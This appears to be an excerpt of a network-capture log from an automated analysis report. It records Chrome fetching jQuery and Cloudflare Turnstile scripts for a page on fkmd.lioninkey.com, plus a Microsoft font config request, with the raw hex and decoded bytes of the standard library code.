                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d4529fe9a4762-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      6192.168.2.1649716151.101.194.1374436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC624OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: code.jquery.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:45 UTC609INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Content-Length: 89501
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                                                                      ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:45 GMT
                                                                                                                                                                                                                                                                                      Age: 824407
                                                                                                                                                                                                                                                                                      X-Served-By: cache-lga21931-LGA, cache-dfw-ktki8620046-DFW
                                                                                                                                                                                                                                                                                      X-Cache: HIT, HIT
                                                                                                                                                                                                                                                                                      X-Cache-Hits: 2, 1
                                                                                                                                                                                                                                                                                      X-Timer: S1729807546.931688,VS0,VE2
                                                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC16384INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                                                                      Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                                                                                                                                                                                                                                      Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                                                                                                                                                                                                                                      Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                                                                                                                                                                                                                                      Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                                                                                                                                                                                                                                      Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC7581INData Raw: 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 69 2e 78 68 72 28 29 3b 69 66 28 72 2e 6f 70 65 6e 28 69 2e 74 79 70 65 2c 69 2e 75 72 6c 2c 69 2e 61 73 79 6e 63 2c 69 2e 75 73 65 72 6e 61 6d 65 2c 69 2e 70 61 73 73 77 6f 72 64 29 2c 69 2e 78 68 72 46 69 65 6c 64 73 29 66 6f 72 28 6e 20 69 6e 20 69 2e 78 68 72 46 69 65 6c 64 73 29 72 5b 6e 5d 3d 69 2e 78 68 72 46 69 65 6c 64 73 5b 6e 5d 3b 66 6f 72 28 6e 20 69 6e 20 69 2e 6d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 26 26 72 2e 6f 76 65 72 72 69 64 65 4d 69 6d 65 54 79 70 65 28 69 2e 6d 69 6d 65 54 79 70 65 29 2c 69 2e 63 72 6f 73 73 44 6f 6d 61 69 6e 7c 7c 65 5b 22 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 22 5d 7c 7c 28 65 5b 22 58 2d 52
                                                                                                                                                                                                                                                                                      Data Ascii: :function(e,t){var n,r=i.xhr();if(r.open(i.type,i.url,i.async,i.username,i.password),i.xhrFields)for(n in i.xhrFields)r[n]=i.xhrFields[n];for(n in i.mimeType&&r.overrideMimeType&&r.overrideMimeType(i.mimeType),i.crossDomain||e["X-Requested-With"]||(e["X-R


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      7192.168.2.1649719184.28.90.27443
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                      If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                      User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                      Host: fs.microsoft.com
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                      Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                      Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                      ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                      Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                      Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                                                      X-CID: 11
                                                                                                                                                                                                                                                                                      X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                      X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                                                      Cache-Control: public, max-age=239996
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:46 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 55
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      X-CID: 2
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                      Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      8192.168.2.1649720104.18.95.414436732C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC649OUTGET /turnstile/v0/b/e1a56f38220d/api.js HTTP/1.1
                                                                                                                                                                                                                                                                                      Host: challenges.cloudflare.com
                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                      Referer: https://fkmd.lioninkey.com/
                                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC471INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Thu, 24 Oct 2024 22:05:46 GMT
                                                                                                                                                                                                                                                                                      Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Length: 47672
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      accept-ranges: bytes
                                                                                                                                                                                                                                                                                      last-modified: Wed, 23 Oct 2024 21:21:17 GMT
                                                                                                                                                                                                                                                                                      cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                                                                      cross-origin-resource-policy: cross-origin
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8d7d452ecb2283a1-DFW
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 6c 5d 28 67 29 2c 75 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 66 29 7b 6e 28 66 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 75 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 75 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                                                                                                                                                                                                                                      Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,l,g){try{var h=e[l](g),u=h.value}catch(f){n(f);return}h.done?r(u):Promise.resolve(u).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var l=e.apply(r,n);funct
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                                                                                                                                                                                                                                      Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 44 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30
                                                                                                                                                                                                                                                                                      Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function D(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(l[0
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75
                                                                                                                                                                                                                                                                                      Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var q;(fu
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 24 7c 7c 28 24 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20
                                                                                                                                                                                                                                                                                      Data Ascii: .NEVER="never",e.MANUAL="manual",e.AUTO="auto"})($||($={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65 62 75 67 53 69 74 65 6b 65 79 4f 76 65 72 72 69 64 65 73 26 26 28
                                                                                                                                                                                                                                                                                      Data Ascii: }function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._debugSitekeyOverrides&&(
                                                                                                                                                                                                                                                                                      2024-10-24 22:05:46 UTC1369INData Raw: 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 66 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53 2c 6c 2c 67 3d 4d 28 6b 72 2c 28 6c 3d 28 72 3d 65 2e 64
                                                                                                                                                                                                                                                                                      Data Ascii: ).concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(f)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES,l,g=M(kr,(l=(r=e.d
